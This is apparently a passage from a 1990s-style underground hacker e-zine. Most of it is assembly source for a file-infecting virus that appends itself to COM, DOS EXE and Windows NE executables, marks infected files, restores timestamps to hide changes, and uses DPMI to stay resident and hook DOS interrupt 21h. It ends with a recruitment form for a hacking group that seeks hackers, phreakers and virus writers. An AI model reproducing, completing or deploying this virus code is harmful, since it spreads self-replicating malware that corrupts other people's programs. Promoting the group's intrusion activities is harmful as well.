;eg F-PROT call infect not_name: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf ret Infect: ;DS:DX=Filename, ES=our data segment cld mov ax,3d02h ;Open file to be infected. call int21h jnc file_opened ret file_opened: xchg bx,ax ;File handle into BX. push es pop ds mov ah,3fh ;Read from file. mov cx,512 mov dx,offset virus_size call int21h mov si,offset virus_size mov ax,word ptr [si] or ax,2020h cmp ax,'zm' ;Test for EXE header je check_exe jmp com_infect check_exe: cmp word ptr [si+12h],0afafh ;Infection marker. jne not_infected bad_mem: jmp com_end not_infected: cmp word ptr [si+18h],40h ;Windows executable. jb exe_infect jmp windows_infect exe_infect: cmp word ptr [si+0ch],-1 ;Maxmem = All jne bad_mem call lseek_end ;Get file length in DX:AX or dx,dx jnz ok_exe_size cmp ax,1000 jb bad_mem ok_exe_size: mov cx,512 div cx inc ax cmp [si+4],ax ;Check for overlays. ja bad_mem mov ax,word ptr [si+0eh] ;Save the original SS:SP mov word ptr old_ss,ax mov ax,word ptr [si+10h] mov word ptr old_sp,ax mov ax,word ptr [si+14h] ;Save the original CS:IP mov word ptr exe_ip,ax mov ax,word ptr [si+16h] mov word ptr exe_cs,ax call lseek_end mov cx,16 div cx sub ax,word ptr [si+8] add dx,offset exe_entry mov word ptr [si+14h],dx ;New IP mov word ptr [si+16h],ax ;New CS dec ax mov word ptr [si+0eh],ax add dx,1500 and dx,0fffeh mov word ptr [si+10h],dx call save_time mov cx,offset virus_size mov ah,40h xor dx,dx call int21h call lseek_end mov cx,512 div cx or dx,dx jz no_page_fix inc ax no_page_fix: mov word ptr [si+4],ax mov word ptr [si+2],dx call lseek_start mov word ptr [si+12h],0afafh ;Set infection marker. mov ah,40h mov dx,si mov cx,1ch call int21h call restore_time jmp com_end com_infect: cmp byte ptr [si+3],0afh ;Com infection marker. je com_end ;Save first four com file bytes. mov di,offset old2 movsw mov di,offset old4 movsw mov ax,4202h ;Lseek to file end. xor cx,cx cwd call int21h or dx,dx ;Check if > 64k jnz com_end cmp ax,60000 ;Check if > 60000 ja com_end cmp ax,1024 jb com_end sub ax,3 mov word ptr com_jmp+1,ax call save_time mov ah,40h ;Write virus body to file. mov cx,offset virus_size xor dx,dx call int21h jc com_end mov ax,4200h ;Lseek to file start. xor cx,cx cwd call int21h mov ah,40h ;Write jump to start of file. mov cx,4 mov dx,offset com_jmp call int21h com_time_end: call restore_time com_end: mov ah,3eh ;Close file. call int21h ret windows_infect: ;Move the Newexe pointer forward. push word ptr [si+3ch] pop word ptr newexe_off sub word ptr [si+3ch],8 cmp word ptr [si+3eh],0 ;Dont want any NE headers at off >64k jne com_end mov word ptr [si+12h],0afafh ;Set infection marker. ;Lseek back to start of the file. mov ax,4200h xor cx,cx cwd call int21h call save_time ;Write header back. mov ah,40h mov cx,512 mov dx,offset virus_size call int21h jc com_end ;Lseek to new exe header mov ax,4200h mov dx,word ptr newexe_off xor cx,cx call int21h ;Read in new exe header mov ah,3fh mov cx,512 mov dx,offset virus_size call int21h ;Adjust header pointers mov ax,word ptr [si+22h] ;AX=Segment table offset. cmp word ptr [si+4],ax jb ok_et add word ptr [si+4],8 ok_et: cmp word ptr [si+24h],ax jb ok_rt add word ptr [si+24h],8 ok_rt: cmp word ptr [si+26h],ax jb ok_rnt add word ptr [si+26h],8 ok_rnt: cmp word ptr [si+28h],ax jb ok_mrt add word ptr [si+28h],8 ok_mrt: cmp word ptr [si+2ah],ax jb ok_int add word ptr [si+2ah],8 ok_int: mov ax,word ptr [si+1ch] inc word ptr [si+1ch] ;Increase segment count. xor dx,dx mov cx,8 mul cx add ax,word ptr [si+22h] ;AX=Offset of segment table end. adc dx,0 mov cx,512 ;512 byte portions are used ; for the reads later on. div cx mov word ptr ne_size,ax mov word ptr last_ne,dx ;Put the original CS:IP into our relocation table. push word ptr [si+14h] pop word ptr old_ip push word ptr [si+16h] pop word ptr old_cs ;Save the alignment shift count because we need that for calculating ;the offset of our segment when writing the segment entry. push word ptr [si+32h] pop word ptr al_shift ;Point CS:IP to the virus. mov word ptr [si+14h],offset win_entry ;The new IP mov ax,word ptr [si+1ch] mov word ptr [si+16h],ax ;The new CS ;Initialise the lseek variable push word ptr newexe_off pop word ptr lseek ;The below code gets the NE header and keeps moving it forward by ;eight bytes in 512 byte chunks. move_header_forward: mov ax,word ptr ne_size or ax,ax jz last_page dec word ptr ne_size mov ax,4200h ;Lseek to our current position. xor cx,cx mov dx,word ptr lseek sub dx,8 call int21h mov ah,40h ;Write the header section out. mov cx,512 mov dx,si call int21h add word ptr lseek,512 mov ax,4200h ;Lseek to the next chunk. xor cx,cx mov dx,word ptr lseek call int21h mov ah,3fh ;Read it. mov dx,offset virus_size mov cx,512 call int21h jmp move_header_forward last_page: mov ax,4202h ;Lseek to end of file. xor cx,cx cwd call int21h ;File length into DX:AX ;DX:AX=File offset of our segment ;Below section shifts the segment offset right by the alignment ;shift value. mov cl,byte ptr al_shift push bx mov bx,1 shl bx,cl mov cx,bx pop bx div cx mov word ptr lseek_add,0 or dx,dx jz no_extra sub cx,dx mov word ptr lseek_add,cx inc ax no_extra: mov di,si add di,word ptr last_ne ;Adding the new segment table entry mov word ptr [di],ax ;Segment offset mov word ptr [di+2],offset virus_size mov word ptr [di+4],180h ;Segment attribute ; 180h = NonMovable + Relocations mov word ptr [di+6],offset virus_size+512 mov ax,4200h ;Lseek to next position. xor cx,cx mov dx,word ptr lseek sub dx,8 call int21h mov ah,40h ;Write rest of NE header + new seg entry. mov cx,word ptr last_ne add cx,8 ;Added segment entry means eight more. mov dx,offset virus_size call int21h ;Reset the relocatable pointer. push word ptr winip push word ptr wincs mov word ptr winip,0 mov word ptr wincs,0ffffh mov ax,4202h ;Lseek to end of file. xor cx,cx mov dx,word ptr lseek_add call int21h mov ah,40h ;Write main virus body. mov cx,offset virus_size xor dx,dx call int21h pop word ptr wincs pop word ptr winip mov ah,40h ;Write the relocation item. mov cx,offset reloc_end - offset relocblk mov dx,offset relocblk call int21h jmp com_time_end int21h: ;Simulated int 21 call. pushf call dword ptr cs:orig21 ret orig21 dd 0 win_entry: ;WinEXE files begin execution here. pusha push ds push es mov ax,51feh ;Residency test. int 21h cmp ax,0ff51h je no_wintsr mov ax,000ah ;Make CS writable. mov bx,cs int 31h ;Use DPMI. mov ds,ax mov ax,0204h ;Get real mode interrupt vector. mov bl,21h int 31h mov word ptr i21,dx ;Save int21 mov word ptr i21+2,cx mov word ptr orig21,dx mov word ptr orig21+2,cx mov ax,501h xor bx,bx ;Allocate Linear region mov cx,offset v_mem_size int 31h push bx push cx xor ax,ax mov cx,1 ;Create a Selector int 31h mov bx,ax mov ax,7 pop dx ;Point selector to linear region. pop cx int 31h mov ax,8 xor cx,cx ;Set selector limit mov dx,offset v_mem_size int 31h mov es,bx mov cx,offset v_mem_size xor si,si ;Copy virus to the linear region xor di,di cld rep movsb mov bx,es mov ax,9 ;Set access rights to 'Code' mov cx,0ffh int 31h mov cx,es mov dx,offset win21 mov ax,205h mov bl,21h int 31h ;Set real mode interrupt vector. mov ax,4 push es pop bx ;Lock the selector int 31h no_wintsr: pop es pop ds popa db 0eah ;Return to original file. winip dw 0 wincs dw 0ffffh ;----------------------- ;Infection Procedures ;----------------------- Save_Time: push ax push cx push dx mov ax,5700h call int21h mov word ptr time,cx mov word ptr date,dx pop dx pop cx pop ax ret Restore_Time: push ax push cx push dx db 0bah ;MOV DX,xxxx date dw 0 db 0b9h ;MOV CX,xxxx time dw 0 mov ax,5701h call int21h pop dx pop cx pop ax ret Lseek_Start: mov al,0 jmp short lseek2 Lseek_End: mov al,2 lseek2: mov ah,42h xor cx,cx cwd call int21h ret ;----------------------- ;Infection Data ;----------------------- ;Com infection data. com_jmp db 0e9h,0,0,0afh ;----------------------- ;Windows infection data. newexe_off dw 0 al_shift dw 0 ne_size dw 0 last_ne dw 0 lseek dw 0 lseek_add dw 0 Relocblk: dw 1 ;Number of relocation items db 3 ;32bit pointer relocation db 4 ;Additive relocation dw offset winip old_cs dw 0 ;The stored original CS & IP of host. old_ip dw 0 Reloc_end: ;----------------------- virus_size: db 512 dup (0) ;Storage buffer. v_mem_size: [---------------------------------] 6. Join the BadSector Hacking Alliance. ~~ ~~~~ ~~~ ~~~~~~~~~ ~~~~~~~ ~~~~~~~~~ There are only 4 memberz of the BadSector Hackering Alliance, we are currently looking for expansion into other countries so we can destroy any competeting groups that may be around. If you wish to join, just fill out the form below and send to th0r@hackermail.com and mark the subject as "BadSector application". Handle : Past Handles* : e-mail : website* : Computer Platform* : Programming Languages : AGE : Occupation* : Groups* (Past/Present): Country : Spoken Languages : (Items marked with a * are not necessary) 1. Which are you interested in?: Hacking [ ], Phreaking [ ], Virii [ ], Programming (NOT virii) [ ], Becoming an *OFFICIAL* BadSector sysop [ ]. 2. Are you a member of *ANY* law enforcement agency or military organisation? YES [ ], NO [ ]. 3. Do you realise that by lying about the above question will void any legal prosecution of *ANY* current BadSector members? YES [ ], NO [ ]. 4. Do you have any experience of hacking/phreaking/virii coding?: YES [ ], NO [ ]. 5. Have you got "3l33t" access to any BBS (Bulletin Boards) in your area/country?: YES [ ], NO [ ]. 6. What do you think you could offer BadSector that they do not already have?: ____________________ ________________________________________________________________________________________________ ________________________________________________________________________________________________ ________________________________________________________________________________________________ 7. How did you hear of BadSector?: BBS [ ], Colleague [ ], Friend [ ], IRC [ ], Newsgroup(s) [ ], Internet [ ], Other: ___________________________________________ 8. Have you any experience of any of the title(s) you are applying for?: YES [ ], NO [ ]. [---------------------------------] That's all folks, 'til next time......